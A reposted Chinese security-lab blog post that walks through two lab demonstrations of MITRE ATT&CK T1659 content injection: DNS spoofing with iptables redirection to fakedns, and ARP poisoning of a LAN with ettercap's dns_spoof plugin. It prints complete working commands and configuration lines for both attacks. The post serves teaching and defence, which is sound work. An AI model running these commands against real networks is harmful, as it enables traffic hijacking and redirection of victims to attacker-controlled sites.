Mitre Att&ck框架T1659技术(内容注入)的简单实现

admin
admin
admin
138635
文章
114
评论
2024年12月3日13:22:13评论16 views字数 2474阅读8分14秒阅读模式
一、技术描述
内容注入技术(Content Injection,T1659),位于初始访问(Initial Sccess)战术中。官方对该技术的描述如下:
对手可能利用在线网络流量向系统注入恶意内容,以此获得访问权限并持续与受害者通信。不同于引诱受害者访问托管在被攻陷网站上的恶意负载,对手可能首先通过被攻陷的数据传输通道访问受害者,在这些通道中他们可以操纵流量并注入自己的内容。这些被攻陷的在线网络通道也可用于向已经被攻陷的系统传递额外的负载(即,入口工具传输)和其他数据。
对手可能以多种方式向受害系统注入内容,包括:
- 中间注入:对手位于合法的在线客户端-服务器通信之间(注意:这与“中间人攻击”类似但不同,后者描述的是仅在企业环境内的活动)
- 从旁注入:恶意内容被注入并作为对合法在线服务器请求的虚假响应快速发送给客户端
内容注入往往是上游通信通道被攻陷的结果,例如在互联网服务提供商(ISP)级别,就像“合法拦截”情况下的那样。
二、技术实现
下面通过两个简单的实验说明T1659技术的实现原理。
(一)使用fakedns,以“中间注入”的方式进行dns欺骗

1、流量转发给fakedns

攻击者攻陷数据传输通道,例如攻入了处于网关位置的Linux主机,IP地址为192.168.242.1。之后使用该主机上的iptables,将dns查询请求的流量转发到本地5533端口。

(1)开启IP转发

//临时开启

sudo sysctl -w net.ipv4.ip_forward=1

//永久开启

echo "net.ipv4.ip_forward = 1" | sudo tee -a /etc/sysctl.conf

(2)添加iptables规则

//使用PREROUTING链处理来自外部的dns请求

sudo iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to-destination 192.168.242.1:5533

//使用OUTPUT链处理本机发出的dns请求

sudo iptables -t nat -A OUTPUT -p udp --dport 53 -j DNAT --to-destination 192.168.242.1:5533

2、编辑配置文件

fakedns运行需要python环境。攻击者将fakedns.py复制到失陷主机。

vi ./dns.conf  //加入目标域名和假冒的IP地址

A .*.t1659.com 111.111.111.111

保存退出。注意,域名是以点开始的。

3、启动fakedns

//启动dns解析服务,监听5533端口

python fakedns.py -c ./dns.conf -i 192.168.242.1 -p 5533 --dns 114.114.114.114

Mitre Att&ck框架T1659技术(内容注入)的简单实现

说明:

-c  //指定配置文件

-i  //指定监听的本机IP地址

-p  //指定监听的端口

--dns  //指定上游dns服务器。fakedns解析失败后,可将dns解析请求发送给上游服务器

4、客户端解析域名

//失陷主机发送测试dns解析请求,指定dns服务器地址为8.8.8.8。该请求会被iptables转发给fakedns

dig @8.8.8.8 -p 53 A www.t1659.com +noall +answer

Mitre Att&ck框架T1659技术(内容注入)的简单实现

dns解析到的是fakedns提供的假冒IP地址,说明攻击成功。

(二)使用ettercap,以“从旁注入”的方式进行dns欺骗

1、成为中间人

攻击者将安装了ettercap的kali主机接入目标网络,配置本机的网络参数(192.168.242.167/24)后,通过ARP欺骗攻击让自己成为中间人。

//针对网关192.168.242.2和局域网全部主机执行ARP欺骗

ettercap -Tq -i eth0 -M arp:remote /192.168.242.2// >> b.txt

Mitre Att&ck框架T1659技术(内容注入)的简单实现

//windows主机查看arp缓存

arp -a

Mitre Att&ck框架T1659技术(内容注入)的简单实现

网关192.168.242.2和主机192.168.242.167的mac地址相同,说明ARP欺骗已成功,攻击者处于中间人的位置。该windows主机原本要发给网关的数据包,现在都会发给攻击者,不再直接发给网关。

2、ettercap配置DNS重定向规则

sudo vi /etc/ettercap/etter.dns //加入下面的行

* A 192.168.242.167

* PTR 192.168.242.167

保存退出。配置中的指令将全部dns请求都解析为攻击者的IP地址。

3、加载DNS欺骗插件

点击ettercap Menu,点击 Plugins — Manage plugins。

找到dns_spoof插件,双击启用。

Mitre Att&ck框架T1659技术(内容注入)的简单实现

这样,在被攻击者访问任意域名时,ettercap都会将其解析为192.168.242.167,这是kali的IP地址。

4、kali开启web服务

//kali开启http服务

sudo python2 -m SimpleHTTPServer 80

5、命令行执行DNS欺骗

ettercap -Tq -i eth0 -M arp:remote /192.168.242.2// -P dns_spoof -L ettercap.txt

6、查看DNS欺骗效果

windows主机访问谷歌网站,域名是谷歌,打开的却是kali上python搭建的网站页面。

Mitre Att&ck框架T1659技术(内容注入)的简单实现

三、总结

通过实验可以看到“中间注入”和“从旁注入”这两种攻击方式的区别。fakedns以“中间注入”方式工作,需要接收客户端的dns解析请求,在实验中是通过iptables转发实现的,并且dns请求只会被发往fakedns,不会被发往客户端指定的dns服务器。而ettercap是通过自己的dns欺骗插件监听客户端的dns请求,利用自己位置上的优势,在公网DNS服务器返回dns响应之前,抢先将假冒IP地址返回给客户端。由于TCP/IP协议栈的特性,客户端通常会接受第一个到达的有效响应,因此 ettercap 的伪造响应会被客户端优先处理。

原文始发于微信公众号(新蜂网络安全实验室):Mitre Att&ck框架T1659技术(内容注入)的简单实现

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月3日13:22:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Mitre Att&ck框架T1659技术(内容注入)的简单实现https://cn-sec.com/archives/3463073.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息